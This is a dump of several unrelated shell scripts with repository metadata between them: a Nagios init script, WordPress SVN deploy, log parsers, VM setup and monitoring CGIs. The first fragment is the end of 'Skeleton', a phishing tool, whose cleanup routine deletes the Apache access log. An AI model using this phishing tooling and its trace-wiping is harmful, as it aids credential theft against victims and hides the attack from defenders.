FLAG
echo -e "\n ~ Control attack switcher~
$B""o$W----------------------------$B""o$W
|$B 1$W)$GR...$W""Stop attack |
|$B 2$W)$GR...$W""Select another attack |
|$B 3$W)$GR...$W""Back to main menu |
|$R 0$W)$GR...$R""Exit$W |
$B""o$W----------------------------$B""o$EC
"
read -p "$SKELEDIAL" opt
case $opt in
1) report; Kill_Process; Kill_Services; Clean_TMP; main;;
2) report; Kill_Another; Clean_TMP; Kill_Services; select_attack;;
3) report; Kill_Process; Kill_Services; Clean_TMP; main;;
0) Kill_Process; Clean_TMP; Kill_Services; EXITMODE;;
*) echo -e "$CL$R[ERROR]$EC"; sleep 2; control;;
esac
}
#~~~~ INFO ~~~~
function inf {
Place="Info_Menu"
clear
FLAG
echo
echo -e " $MENU_info
$B""o$W------------------------$B+
$W|$CL$G Name:....Skeleton $EC$W|
$W|$CL$G Dev:.....Shell $EC$W|
$W|$CL$G Ver:.....$VERSION $EC$W|
$W|$CL$G Date:....10/28/2018 $EC$W|
$W|$CL$G Coder:...Kuro-code $EC$W|
$W|$CL$G Info:....Phishing tool $EC$W|
$B""o$W------------------------$B""o$W
[$M!$W] Special thanks: Z0mB13Do77 [$M!$W]
[$Y¡$W] Press$Y Enter$W, return main menu [$Y¡$W]$EC "
read pause
main
}
#~~~~ Report ~~~~
function report {
Place"report"
clear
FLAG
echo -e "
$W[$R*$W]$GR...$W""Stop attack$GR...$W[$R*$W]"
RPRT=`cat $TMP/id.txt`
Date=`date +%D`
echo -e "\n ~ $site Phishing Session ~
****************************************
$Date
$RPRT
===============================
SkEleToN 1.2
===============================
" > $site.txt
}
#~~~~ Exit ~~~~
function EXITMODE {
clear
FLAG
echo
echo -e "\n $CL Thanks for use Skeleton $EC"
sleep 2.5
clear
exit
}
#~~~~ Function Kill ~~~~
function Kill_Services() {
echo -e "\n$W[$R+$W]$GR Close services."
sleep 0.1
echo -e "\n$W[$R+$W]$GR Shutdow Apache."
service apache2 stop
chmod 700 /var/www/html
sleep 1
}
function Kill_Another() {
echo -e "\n$W[$R+$W]$GR Kill process... "
pkill key.sh
sleep 0.2
pkill tail
sleep 1
}
function Kill_Process() {
echo -e "\n$W[$R+$W]$GR Kill process... "
pkill key.sh
sleep 0.2
pkill $Sys
sleep 0.2
pkill tail
sleep 1
}
#~~~~ CLEAN TMP ~~~~
function Clean_TMP() {
echo -e "\n$W[$G+$W]$GR Clean temporary files"
rm -rf $TMP/*
sleep 0.2
rm -f /var/log/apache2/access.log
sleep 0.2
rm -f key.sh
sleep 0.2
rm -f *.csv
sleep 0.2
}
#~~~~ FLAG ~~~~
function FLAG {
echo -e "$B _______$W __ __ __
$B| _ |$W |--.-----| .-----| |_.-----.-----.
$B| 1___|$W <| -__| | -__| _| _ | |
$B|____ |$W""__|__|_____|__|_____|____|_____|__|__|
$B|: 1 |
$B|_______| $W""Social engineering tool$GE v$VERSION$EC "
}
#~~~~ Hard Exit ~~~~
function cap_traps() {
case $Place in
"Run") clear; EXITMODE;;
"MAIN") clear; EXITMODE;;
"Sel_Attack") clear; FLAG; Clean_TMP; EXITMODE;;
"Info_Menu") clear; EXITMODE;;
"Lang") clear; FLAG; Clean_TMP; EXITMODE;;
"Set_Serv") clear; FLAG; Clean_TMP; EXITMODE;;
"Control") clear; FLAG; Kill_Process; Kill_Services; Clean_TMP; EXITMODE;;
esac
}
for x in SIGINT SIGHUP INT SIGTSTP; do
trap_cmd="trap \"cap_traps $x\" \"$x\""
eval "$trap_cmd"
done
#### START ####
check_root_perm
| true |
521ec2ad91f5b6fba7f8b4c78f6370c0d5924971 | Shell | chinaares/jnrpe | /jnrpe-debian/src/deb/init.d/jnrpe | UTF-8 | 2,031 | 3.59375 | 4 | [] | no_license | #!/bin/sh
### BEGIN INIT INFO
# Provides: jnrpe
# Required-Start: $start_dependencies
# Required-Stop: $stop_dependencies
# Default-Start: $w_start_levels
# Default-Stop: $w_stop_levels
# Short-Description: yajsw wrapper for jnrpe
# Description: Java Nagios Remote Plugin Executor
### END INIT INFO
# config: /etc/jnrpe/wrapper.conf
# pidfile: /run/wrapper.jnrpe.pid
# apppidfile: /run/wrapper.$JAVA.jnrpe.pid
#-----------------------------------------------------------------------------
# YAJSW sh script template. Suitable for starting and stopping
# wrapped daemon on POSIX platforms.
#-----------------------------------------------------------------------------
JAVA=/usr/bin/java
WRAPPER_CONF=/etc/jnrpe/wrapper.conf
WRAPPER_PATH=/usr/local/jnrpe/wrapper
status() {
eval ""$JAVA" "-Dwrapper.pidfile=/run/wrapper.jnrpe.pid" "-Dwrapper.service=true" "-Dwrapper.visible=false" "-Djna_tmpdir=$WRAPPER_PATH" "-jar" "$WRAPPER_PATH/wrapper.jar" "-qx" "$WRAPPER_CONF" > /dev/null 2>&1"
if [ $? -eq 0 ]
then
echo "Service jnrpe is runnning"
else
echo "Service jnrpe is not runnning"
fi
}
stopit() {
echo "Stopping jnrpe ..."
eval ""$JAVA" "-Dwrapper.pidfile=/run/wrapper.jnrpe.pid" "-Dwrapper.service=true" "-Dwrapper.visible=false" "-Djna_tmpdir=$WRAPPER_PATH" "-jar" "$WRAPPER_PATH/wrapper.jar" "-px" "$WRAPPER_CONF" > /dev/null 2>&1"
}
startit() {
echo "Starting jnrpe ..."
eval ""$JAVA" "-Dwrapper.pidfile=/run/wrapper.jnrpe.pid" "-Dwrapper.service=true" "-Dwrapper.visible=false" "-Djna_tmpdir=$WRAPPER_PATH" "-jar" "$WRAPPER_PATH/wrapper.jar" "-tx" "$WRAPPER_CONF" > /dev/null 2>&1"
}
case "$1" in
'start')
startit
;;
'stop')
stopit
;;
'restart')
stopit
startit
;;
'force-reload')
stopit
startit
;;
'status')
status
;;
*)
echo "Usage: $0 { start | stop | restart | status }"
exit 1
;;
esac
exit $? | true |
222fd537f76d72d6477964a990e5fe4da14fa133 | Shell | leobaiano/dotfiles | /bin/wp-plugin-deploy | UTF-8 | 1,984 | 3.5 | 4 | [
"MIT"
] | permissive | #!/usr/bin/env bash
# WP Plugin Deploy
#
echo "-------------------------------------------"
echo " WORDPRESS PLUGIN RELEASER "
echo "-------------------------------------------"
read -p "VERSION: " VERSION
# Get the current plugin directory name.
# This need to match with the plugin slug.
PROJECT_NAME=${PWD##*/}
# Save the current path.
GIT_PATH=$PWD
# SVN repos.
SVN_REPOSITORIES_PATH=~/Projects/wordpress-plugins-svn
# Project SVN path.
SVN_PATH=$SVN_REPOSITORIES_PATH/$PROJECT_NAME
echo "Commiting and creating tag on Git"
git commit -am "Release "${VERSION}", see readme.txt for changelog."
git tag $VERSION
git push origin master --tags
# Update SVN.
cd $SVN_PATH
echo "Updating SVN"
svn update
# Send all files to SVN trunk excluding some dev files.
cd $GIT_PATH
rsync ./ $SVN_PATH/trunk/ --recursive --verbose --delete --delete-excluded \
--exclude=.codeclimate.yml \
--exclude=.coveralls.yml \
--exclude=.editorconfig \
--exclude=.git/ \
--exclude=.gitattributes \
--exclude=.github \
--exclude=.gitignore \
--exclude=.gitmodules \
--exclude=.jscrsrc \
--exclude=.jshintrc \
--exclude=.sass-cache \
--exclude=.scrutinizer.yml \
--exclude=.travis.yml \
--exclude=apigen.neon \
--exclude=apigen/ \
--exclude=CHANGELOG.txt \
--exclude=composer.json \
--exclude=composer.lock \
--exclude=CONTRIBUTING.md \
--exclude=Gruntfile.js \
--exclude=node_modules \
--exclude=package.json \
--exclude=phpcs.ruleset.xml \
--exclude=phpunit.xml \
--exclude=phpunit.xml.dist \
--exclude=README.md \
--exclude=tests/ \
--exclude=vendor
# Remove old files and add new files.
cd $SVN_PATH
svn st | grep ^! | awk '{print " --force "$2}' | xargs svn rm
svn add --force * --auto-props --parents --depth infinity -q
# Create tag in SVN.
svn copy trunk tags/${VERSION}
echo "Commiting to wp.org SVN repository"
# Commit it to wp.org.
svn commit -m "Release "${VERSION}", see readme.txt for changelog."
echo "WORDPRESS PLUGIN RELEASER DONE"
| true |
e045a0f92f14fe4d721989b340883331cfc103a2 | Shell | reece/reece-base | /archive/bin/hackftplog.ksh | UTF-8 | 1,533 | 3.53125 | 4 | [
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | #!/bin/perl -w
##
## $RCSfile: hackftplog.ksh,v $
## $Revision: 1.2 $
## $Date: 1995/09/27 23:40:03 $
##
## NAME
## hackftplog - replace pid with where,who for more descriptive ftp logging
##
## SYNOPSIS
## hackftplog file
## hackftplog < file
##
## DESCRIPTION
## ftp logs have the form
## date ftpd[pid]: ANONYMOUS FTP LOGIN FROM where.inthe.world, id=who
## date ftpd[pid]: action
## In order to figure out who did the action, you've gotta look back and find
## the matching pid from a login line. This script replaces the pids with
## the more informative where,who text.
##
## REQUIREMENTS
## perl
##
## AVAILABILITY
## New versions of this file may be obtained from
## http://dasher.wustl.edu/~reece/src/hackftplog
##
## @@banner@@
##
$DFE="A30 A20"; # pack template for fqdn, email address
while (<>)
{
# Add anonymous ftp login to list by generating an associative array
# keyed to the pid. There are two types of lines we're looking for:
# 1) Contain ANONYMOUS FTP LOGIN FROM ...
/ftpd\[([0-9]*)\]: ANONYMOUS FTP LOGIN FROM ([^,]*), id=(.*)/ && do
{
($pid,$fqdn,$email) = ($1,$2,$3);
$ftplog{$pid}=pack($DFE,$fqdn,$email);
};
# 2) connection from
/ftpd\[([0-9]*)\]: connection from ([^,]*)/ && do
{
($pid,$fqdn,$email) = ($1,$2,'');
$ftplog{$pid}=pack($DFE,$fqdn,$email);
};
# if it's a ftp log message, replace the pid with the where,who text
/ftpd\[([0-9]*)\]:/ && do
{
$pid=$1;
($fqdn,$email)=unpack($DFE,$ftplog{$pid});
s/ftpd\[$pid\]/[$fqdn,$email]/;
};
print $_;
}
| true |
5122e24127f713424f4f410398cd84b23f8e2477 | Shell | gentoo-perl/gentoo-perl-helpers | /t/core-functions/dorun.t.sh | UTF-8 | 525 | 3.015625 | 3 | [] | no_license | source lib/core-functions.sh || exit 1
echo "====[ dorun test ]===="
function softspot() {
[[ ${cmdname} == 'softspot' ]] || die "FAIL: cmdname is not softspot"
einfo "Command name is ${cmdname}, FULL_COMMAND=${FULL_COMMAND}"
}
function deepspot() {
[[ ${cmdname} == 'deepspot' ]] || die "FAIL: cmdname is not deepspot"
einfo "Command name is ${cmdname}, FULL_COMMAND=${FULL_COMMAND}"
dorun softspot
einfo "Command name is ${cmdname}, FULL_COMMAND=${FULL_COMMAND}"
}
(
dorun softspot
)
(
dorun deepspot
)
| true |
4fd13464f316ca70b0da80d30ac369a75ac1b382 | Shell | packetscrub/reverse-fwk | /create-vbox-vm | UTF-8 | 1,507 | 3.59375 | 4 | [] | no_license | #!/bin/bash
# Create VirtualBox VM using an Ubuntu server ISO
# https://www.linuxtechi.com/manage-virtualbox-virtual-machines-command-line/
PROJ_DIR="$(pwd)"
ISO_PATH="$PROJ_DIR/iso"
VM_NAME="reversing-framework"
OS_TYPE="Ubuntu_64"
VBOX_PATH="$PROJ_DIR/$VM_NAME/$VM_NAME.vdi"
# Check if iso exists already, otherwise download it
# This should be replaced with a python script in future for given user file
ISO_FILE="$(find $ISO_PATH -type f -name '*.iso')"
if [ -z $ISO_FILE ]; then
echo "No ISO found, downloading ubuntu-18.04.2 server image"
wget -P $ISO_PATH "http://cdimage.ubuntu.com/releases/18.04/release/ubuntu-18.04.2-server-amd64.iso"
ISO_FILE="ubuntu-18.04.2-server-amd64.iso"
echo "using ISO $(basename $ISO_FILE)"
else
echo "Found ISO $(basename $ISO_FILE)"
fi
# VBox create VM
VBoxManage createvm --name $VM_NAME --ostype $OS_TYPE --register
# need to create network here
VBoxManage modifyvm $VM_NAME --memory 1024
VBoxManage createhd --filename $VBOX_PATH --size 10000 --format VDI
VBoxManage storagectl $VM_NAME --name "SATA Controller" --add sata --controller IntelAhci
VBoxManage storageattach $VM_NAME --storagectl "SATA Controller" --port 0 --device 0 --type hdd --medium $VBOX_PATH
VBoxManage storagectl $VM_NAME --name "IDE Controller" --add ide --controller PIIX4
VBoxManage storageattach $VM_NAME --storagectl "IDE Controller" --port 1 --device 0 --type dvddrive --medium $ISO_FILE
# Start VM
VBoxManage startvm $VM_NAME
| true |
6d17f47f4b26909fd5560b0e0d8a8331e956f649 | Shell | semenovdv/4sem_labs | /da/6lab_debug/wrapper.sh | UTF-8 | 335 | 3.296875 | 3 | [] | no_license | #!/usr/bin/env bash
for test_file in `ls tests/*.t`; do
echo "Execute ${test_file}"
if ! ./6lab < $test_file > last_answer ; then
echo "ERROR"
continue
fi
answer_file="${test_file%.*}"
if ! diff -u "${answer_file}.a" last_answer ; then
echo "Failed"
else
echo "OK"
fi
done | true |
7abd3bbaf20463502580675b53e4177d88db6499 | Shell | fedora-modularity/base-runtime-tools | /misc/savelogs.sh | UTF-8 | 510 | 3.421875 | 3 | [
"MIT"
] | permissive | #!/bin/sh
build=$1
[ -z "$build" ] && { echo "Usage: savelogs.sh <build>"; exit; }
[ -d ~/results/$build ] || { echo "Build $build doesn't exist!"; exit; }
[ -d ~/logs/$build ] && { echo "Logs for $build already exist!"; exit; }
mkdir ~/logs/$build
cd ~/results/$build/results
cp -R repodata ~/logs/$build/
for pkg in $(grep -Fl failed *-status.log|sed 's/-status\.log//'); do
for log in build mock-stderr mock-stdout root state status; do
[ -f $pkg-$log.log ] && ln $pkg-$log.log ~/logs/$build/
done
done
| true |
6c7bd3df372e05770ed67b39e0a6ee1855411d79 | Shell | regilo76/pButtonsExtract | /pbreportlib/linux.sh | UTF-8 | 6,578 | 4 | 4 | [] | no_license | while [ "$CountFile" -lt "$NumberFiles" ]
do
echo "File " $((CountFile + 1)) " out of " $NumberFiles;
DateTime=$(echo ${Files[$CountFile]} | awk -F"_" '{print $3 " " substr($4,1,4)}');
echo "**********Verifying date and time:" $DateTime;
InitialTime=`date --date="$DateTime" +"%s"`
Intervals=$(awk '{if($0 ~ /Run over/) {print $0; exit;}}' $1"/"${Files[$CountFile]});
echo $Intervals
NumberLines=$(echo $Intervals | cut -d " " -f 3);
#echo "File contains " $NumberLines " records."
TimeUnit=$(echo $Intervals | cut -d " " -f 7);
IntervalValue=$(echo $Intervals | cut -d " " -f 6);
#echo "running every " $IntervalValue " " $TimeUnit
if [ $TimeUnit == "minutes." ]; then
IntervalValue=$((IntervalValue * 60));
fi
echo "Extracting mgstat data from: " ${Files[$CountFile]}
awk -v mgstat=$MgstatFile -v physicalread=$PhysicalReadFile -v iorequest=$IORequestFile -v globalreference=$GlobalReferenceFile -F"," 'BEGIN{OFS=","}{
if($0 ~ /end_mgstat/) exit;
if(mg_imprime > 0){
if(mg_imprime >= 3){
gsub(/ /, "");
if($6 != 0) print $1"_"$2, $7 >> mgstat;
print $1"_"$2, $6 >> physicalread;
print $1"_"$2, $6 + $(12) + $(14) + $(18) + $(19) >> iorequest;
print $1"_"$2, $3 + $4 >> globalreference;
}
mg_imprime++;
}
if($0 ~ /beg_mgstat/) mg_imprime = 1;
}' $1"/"${Files[$CountFile]};
echo "Extracting vmstat data from:" $1"/"${Files[$CountFile]};
awk -v vm_time=$InitialTime -v runblocked=$RunBlockedFile -v tpfile=$TotalProcessFile -v total_cores=$Cores -v fpfile=$FreePagesFile -v swfile=$SwapFile -v pifile=$PageInFile -v pofile=$PageOutFile -v csfile=$ContextSwitchFile -v ctfile=$CPUTimeFile -v cufile=$CPUUtilizationFile 'BEGIN{OFS=","}{
if($0 ~ /end_vmstat/){
printf "\n";
exit;
}
if(vm_imprime > 0){
if(vm_imprime > 1 && $1 != "") {
printf "\rprocessing vmstat line: %s", vm_imprime;
split($1,vmdate,"/");
rdate = vmdate[1]"/"vmdate[2]"/20"vmdate[3];
print rdate"_"$2, $3, $4 >> runblocked;
total_process = $3 + $4;
print rdate"_"$2, total_process, total_cores >> tpfile;
print rdate"_"$2, $6 >> fpfile;
print rdate"_"$2, $9 >> pifile;
print rdate"_"$2, $(10) >> pofile;
print rdate"_"$2, $(14) >> csfile
print rdate"_"$2, $5 >> swfile;
print rdate"_"$2, $(15), $(16), $(18) >> ctfile
utilization = $(15) + $(16) + $(18)
print rdate"_"$2, utilization >> cufile
}
vm_imprime++;
}
if($0 ~ /beg_vmstat/) vm_imprime = 1;
}' $1"/"${Files[$CountFile]};
echo "Extracting iostat from "$1"/"${Files[$CountFile]};
awk -v initime=$InitialTime -v tm_interval=$IntervalValue -v fcount=$CountFile -v folder=$DataFolder"/"$ServerName 'BEGIN{OFS=","; imprime = 0; disk = 1; count = 0; dcount = 0}{
if(imprime > 0){
if($0 ~ /Back to top/){
printf "\n";
exit;
}
if(disk != 0 && imprime > 5){
if ($0 ~ /avg-cpu/ || $0 ~ /:/){
printf "\nThere are " disk " disk(s). Spliting and formatting data.\n";
disk = 0;
} else {
rddisk[$1] = folder"service_time_"$1;
wtdisk[$1] = folder"wait_"$1;
utdisk[$1] = folder"utilization_"$1;
if (fcount == 0){
print "date_time,avg service time (svctm)" >> rddisk[$1];
print "date_time,avg wait time (await)" >> wtdisk[$1];
print "date_time,utilization (%util)" >> utdisk[$1];
}
disk++;
dcount++;
}
}
if($0 ~ /Device:/) printf"\rProcessing ocorrence: %s", ioline++;
if(imprime > 4 && $1 in rddisk){
tmp = "date -d@" initime " \"+%m/%d/%Y_%H:%M:%S\"";
tmp | getline myepoch
print myepoch, $(11) >> rddisk[$1];
print myepoch, $(12) >> utdisk[$1];
print myepoch, $(10) >> wtdisk[$1];
close(tmp);
count++;
if(count == dcount){
count = 0;
initime = initime + tm_interval;
}
}
imprime++;
}
if($0 ~ /div id=iostat/) imprime = 1;
}' $1"/"${Files[$CountFile]};
gzip $1"/"${Files[$CountFile]};
mv -v $1"/"${Files[$CountFile]}".gz" $ProcessedFolder;
CountFile=$(( CountFile + 1 ));
done
| true |
2886df4b3960c165b0466f5bf1824f4772efe5f3 | Shell | hugme/nac | /nac-ui/cgi-bin/bin/role_edit | UTF-8 | 13,531 | 3.40625 | 3 | [
"MIT"
] | permissive | #!/bin/bash
# set some variables
. $(cat varset)
use_admin_functions
use_base_functions
use_bust_functions
use_date_functions
#echo $QUERY_STRING
for X in ${QUERY_STRING//&/ }; do
case $X in
SCR=*) SCR=${X#*=};;
DO=*) DO=${X#*=};;
ROLE_ID=*) ROLE_ID=${X#*=};;
DELETE_SRV=*) [[ -z $DELETE_SRV ]] && DELETE_SRV="${X#*=}" || DELETE_SRV="${DELETE_SRV}|${X#*=}";;
DELETE_ESC=*) [[ -z $DELETE_SRV ]] && DELETE_ESC="${X#*=}" || DELETE_ESC="${DELETE_ESC}|${X#*=}";;
DELETE_DEP=*) [[ -z $DELETE_SRV ]] && DELETE_DEP="${X#*=}" || DELETE_DEP="${DELETE_DEP}|${X#*=}";;
NEW_SRV=*) NEW_SRV=${X#*=};;
NEW_ESC=*) NEW_ESC=${X#*=};;
NEW_DEP=*) NEW_DEP=${X#*=};;
NEW_HOST_TEMPLATE=*) NEW_HOST_TEMPLATE=${X#*=};;
esac
done
########
## Print the main page
[[ -z $DO || $DO == SHOW ]] && {
# we are going to count the number of servers in each role
unset ROLE_ID_COUNT
while IFS="|" read CURR_ID _ ; do
[[ -z $SERVER_COUNT[CURR_ID]} ]] && SERVER_COUNT[CURR_ID]=1 || SERVER_COUNT[CURR_ID]=$((${SERVER_COUNT[CURR_ID]}+1))
done< <(echo "select r.role_id from role r,servers s where r.role_id=s.role order by role_id;" | sql_query)
echo "<table border=1 cellspacing=0 cellpadding=2>"
echo "<tr><td>Role Name</td><td>Server<br>Count</td><td>Service<br>Count</td><td></td>"
echo "<td>Role Name</td><td>Server<br>Count</td><td>Service<br>Count</td><td></td>"
echo "<td>Role Name</td><td>Server<br>Count</td><td>Service<br>Count</td></tr>"
i=1
while IFS="|" read ROLE_ID ROLE SERVICES _ ; do
unset CHANGE_COLOR
SERVICE_COUNT=$(echo $SERVICES | wc -w)
[[ -z ${SERVER_COUNT[ROLE_ID]} ]] && { SERVER_COUNT[ROLE_ID]=0 ; CHANGE_COLOR[0]="bgcolor=yellow" ; CHANGE_COLOR[1]="bgcolor=yellow" ; }
[[ $SERVICE_COUNT == 0 ]] && { CHANGE_COLOR[0]="bgcolor=yellow" ; CHANGE_COLOR[2]="bgcolor=yellow"; }
[[ ! -z $ROLE ]] && {
[[ $i == 0 ]] && echo "<tr>"
echo "<td ${CHANGE_COLOR[0]}><a href=\"/cgi-bin/auth.cgi?SCR=$SCR&DO=ROLE&ROLE_ID=$ROLE_ID\">$ROLE</a></td>"
echo "<td ${CHANGE_COLOR[1]}>${SERVER_COUNT[ROLE_ID]}</td>"
echo "<td ${CHANGE_COLOR[2]}>$SERVICE_COUNT</td>"
[[ $i == 1 || $i == 2 ]] && echo "<td bgcolor=#AAAAAA> </td>"
[[ $i == 3 ]] && { echo "</tr>"; i=0; }
i=$(($i+1))
}
done< <(echo "select role_id,name,services from role order by name" | sql_query)
cat << EOF
</table>
<br><br>
<center><a href="/cgi-bin/auth.cgi/?SCR=role_delete">Delete a role</a></center>
EOF
exit 0
}
########
## make updates if requested
[[ $DO == UPDATE ]] && {
[[ -n "$DELETE_SRV" ]] && {
SRV_FOR_HOST=$(echo "select services from ROLE where role_id='$ROLE_ID';"|sql_query)
NEW_SERVICE_LIST=$SRV_FOR_HOST
while IFS="|" read DEL_SRV ; do
unset CHECK_EXIST
for CHECK_SERVICE in $NEW_SERVICE_LIST ; do [[ $DEL_SRV == $CHECK_SERVICE ]] && CHECK_EXIST=YES; done
[[ $CHECK_EXIST != YES ]] && ERROR="$ERROR That service does not exist in this role"
[[ -z $ERROR ]] && {
unset BUILD_SERV_LIST
for CHECK_SERVICE in $NEW_SERVICE_LIST ; do
[[ ! $DEL_SRV == $CHECK_SERVICE ]] && { [[ -z $BUILD_SERV_LIST ]] && BUILD_SERV_LIST=$CHECK_SERVICE || BUILD_SERV_LIST="$BUILD_SERV_LIST $CHECK_SERVICE"; }
done
NEW_SERVICE_LIST=$BUILD_SERV_LIST
}
done< <(echo $DELETE_SRV| tr "|" "\n")
#[[ ${#NEW_SERVICE_LIST} -lt 2 ]] && ERROR="$ERROR<br>Too many services have been lost. Please contact your monitoring team"
SRV_CHANGE_AVERAGE=$(echo "scale=10;((${#SRV_FOR_HOST}-${#NEW_SERVICE_LIST})/${#SRV_FOR_HOST})*100" | bc | cut -d "." -f 1)
[[ $SRV_CHANGE_AVERAGE -gt 50 && ${#NEW_SERVICE_LIST} -gt 2 ]] && ERROR="$ERROR<br>You are attempting to make too large of a change. Please contact your monitoring team"
[[ -z $ERROR ]] && {
echo "update role set services='$NEW_SERVICE_LIST' where role_id='$ROLE_ID';"|sql_update
#echo "update role set services='$NEW_SERVICE_LIST' where role_id='$ROLE_ID';"
echo "$LOG_DATE $USERNAME MANUAL RM_ROLE_SERVICE $ROLE delete:$(echo $DELETE_SRV| tr "|" " ") ; OLD:$SRV_FOR_HOST NEW:$NEW_SERVICE_LIST " >> $ACTIVITY_LOG
}
}
[[ -n "$DELETE_ESC" ]] && {
ESC_FOR_HOST=$(echo "select escalations from ROLE where role_id='$ROLE_ID';"|sql_query)
NEW_ESC_LIST=$ESC_FOR_HOST
while IFS="|" read DEL_ESC ; do
unset CHECK_EXIST
for CHECK_ESC in $NEW_ESC_LIST ; do [[ $DEL_ESC == $CHECK_ESC ]] && CHECK_EXIST=YES; done
[[ $CHECK_EXIST != YES ]] && ERROR="$ERROR That escalation does not exist in this role"
[[ -z $ERROR ]] && {
unset BUILD_ESC_LIST
for CHECK_ESC in $NEW_ESC_LIST ; do
[[ ! $DEL_ESC == $CHECK_ESC ]] && { [[ -z $BUILD_ESC_LIST ]] && BUILD_ESC_LIST=$CHECK_ESC || BUILD_ESC_LIST="$BUILD_ESC_LIST $CHECK_ESC"; }
done
NEW_ESC_LIST=$BUILD_ESC_LIST
}
done< <(echo $DELETE_ESC| tr "|" "\n")
[[ ${#NEW_ESC_LIST} -lt 2 ]] && ERROR="$ERROR<br>Too many escalations have been lost. Please contact your monitoring team"
ESC_CHANGE_AVERAGE=$(echo "scale=10;((${#ESC_FOR_HOST}-${#NEW_ESC_LIST})/${#ESC_FOR_HOST})*100" | bc | cut -d "." -f 1)
[[ $ESC_CHANGE_AVERAGE -gt 50 ]] && ERROR="$ERROR<br>You are attempting to make too large of a change. Please contact your monitoring team"
[[ -z $ERROR ]] && {
#echo "update role set escalations='$NEW_ESC_LIST' where role_id='$ROLE_ID';"|sql_update
echo "update role set escalations='$NEW_ESC_LIST' where role_id='$ROLE_ID';"
echo "$LOG_DATE $USERNAME MANUAL RM_ROLE_ESCALATION $ROLE delete:$(echo $DELETE_ESC| tr "|" " ") ; OLD:$ESC_FOR_HOST NEW:$NEW_ESC_LIST " >> $ACTIVITY_LOG
}
}
[[ -n "$DELETE_DEP" ]] && {
DEP_FOR_HOST=$(echo "select deps from ROLE where role_id='$ROLE_ID';"|sql_query)
NEW_DEP_LIST=$DEP_FOR_HOST
while IFS="|" read DEL_DEP ; do
unset CHECK_EXIST
for CHECK_DEP in $NEW_DEP_LIST ; do [[ $DEL_DEP == $CHECK_DEP ]] && CHECK_EXIST=YES; done
[[ $CHECK_EXIST != YES ]] && ERROR="$ERROR That dependancy does not exist in this role"
[[ -z $ERROR ]] && {
unset BUILD_DEP_LIST
for CHECK_DEP in $NEW_DEP_LIST ; do
[[ ! $DEL_DEP == $CHECK_DEP ]] && { [[ -z $BUILD_DEP_LIST ]] && BUILD_DEP_LIST=$CHECK_DEP || BUILD_DEP_LIST="$BUILD_DEP_LIST $CHECK_DEP"; }
done
NEW_DEP_LIST=$BUILD_DEP_LIST
}
done< <(echo $DELETE_DEP| tr "|" "\n")
[[ ${#NEW_DEP_LIST} -lt 2 ]] && ERROR="$ERROR<br>Too many dependancies have been lost. Please contact your monitoring team"
DEP_CHANGE_AVERAGE=$(echo "scale=10;((${#DEP_FOR_HOST}-${#NEW_DEP_LIST})/${#DEP_FOR_HOST})*100" | bc | cut -d "." -f 1)
[[ $DEP_CHANGE_AVERAGE -gt 50 ]] && ERROR="$ERROR<br>You are attempting to make too large of a change. Please contact your monitoring team"
[[ -z $ERROR ]] && {
#echo "update role set deps='$NEW_DEP_LIST' where role_id='$ROLE_ID';"|sql_update
echo "update role set deps='$NEW_DEP_LIST' where role_id='$ROLE_ID';"
echo "$LOG_DATE $USERNAME MANUAL RM_ROLE_DEPENDANCY $ROLE delete:$(echo $DELETE_DEP| tr "|" " ") ; OLD:$DEP_FOR_HOST NEW:$NEW_DEP_LIST " >> $ACTIVITY_LOG
}
}
[[ -n "$NEW_SRV" ]] && {
NEW_SRV_ID=$(echo "select service_id from services where name='${NEW_SRV//+/ }';"|sql_query)
SRV_FOR_HOST=$(echo "select services from ROLE where role_id='$ROLE_ID';"|sql_query)
unset CHECK_EXIST
for CHECK_SERVICE in $SRV_FOR_HOST ; do [[ $NEW_SRV_ID == $CHECK_SERVICE ]] && CHECK_EXIST=YES; done
[[ $CHECK_EXIST == YES ]] && ERROR="$ERROR That service does not exist in this role"
[[ -z $ERROR ]] && {
NEW_SERVICE_LIST="$SRV_FOR_HOST $NEW_SRV_ID"
echo "update role set services='$NEW_SERVICE_LIST' where role_id='$ROLE_ID';" | sql_update
echo "$LOG_DATE $USERNAME MANUAL ADD_ROLE_SERVICE $ROLE $NEW_SRV_ID" >> $ACTIVITY_LOG
}
}
[[ -n "$NEW_ESC" ]] && {
NEW_ESC_ID=$(echo "select esc_id from escalations where name='${NEW_ESC//+/ }';"|sql_query)
ESC_FOR_HOST=$(echo "select escalations from ROLE where role_id='$ROLE_ID';"|sql_query)
unset CHECK_EXIST
for CHECK_ESC in $ESC_FOR_HOST ; do [[ $NEW_ESC_ID == $CHECK_SERVICE ]] && CHECK_EXIST=YES; done
[[ $CHECK_EXIST == YES ]] && ERROR="$ERROR That escalation does not exist in this role"
[[ -z $ERROR ]] && {
NEW_ESC_LIST="$ESC_FOR_HOST $NEW_ESC_ID"
echo "update role set escalations='$NEW_ESC_LIST' where role_id='$ROLE_ID';" | sql_update
echo "$LOG_DATE $USERNAME MANUAL ADD_ROLE_ESC $ROLE $NEW_ESC_ID" >> $ACTIVITY_LOG
}
}
[[ -n "$NEW_DEP" ]] && {
NEW_DEP_ID=$(echo "select dep_id from deps where name='${NEW_DEP//+/ }';"|sql_query)
DEP_FOR_HOST=$(echo "select deps from ROLE where role_id='$ROLE_ID';"|sql_query)
unset CHECK_EXIST
for CHECK_DEP in $DEP_FOR_HOST ; do [[ $NEW_DEP_ID == $CHECK_SERVICE ]] && CHECK_EXIST=YES; done
[[ $CHECK_EXIST == YES ]] && ERROR="$ERROR That dependancy does not exist in this role"
[[ -z $ERROR ]] && {
NEW_DEP_LIST="$DEP_FOR_HOST $NEW_DEP_ID"
echo "update role set DEPS='$NEW_DEP_LIST' where role_id='$ROLE_ID';" | sql_update
echo "$LOG_DATE $USERNAME MANUAL ADD_ROLE_DEP $ROLE $NEW_DEP_ID" >> $ACTIVITY_LOG
}
}
[[ -n "$NEW_HOST_TEMPLATE" ]] && {
[[ -z $(echo "select host_template_id from host_template where host_template_id='$NEW_HOST_TEMPLATE';" | sql_query) ]] && ERROR="$ERROR <br> That is not a valid host template"
[[ -z $ERROR ]] && {
echo "update role set host_template='$NEW_HOST_TEMPLATE' where role_id='$ROLE_ID';" | sql_update
echo "$LOG_DATE $USERNAME MANUAL ADD_ROLE_HOST_TEMPLATE $NEW_HOST_TEMPLATE" >> $ACTIVITY_LOG
}
}
DO=ROLE
}
###############################################
## Show the role
[[ $DO == ROLE ]] && {
#echo "==$QUERY_STRING==<br>"
# Get the host templates
while IFS="|" read NUM NAME _ ; do
HT_NAME[$NUM]="$NAME"
done< <(echo "select host_template_id,name from host_template;"|sql_query)
# Get the services
while IFS="|" read NUM NAME DESC USE CC _ ; do
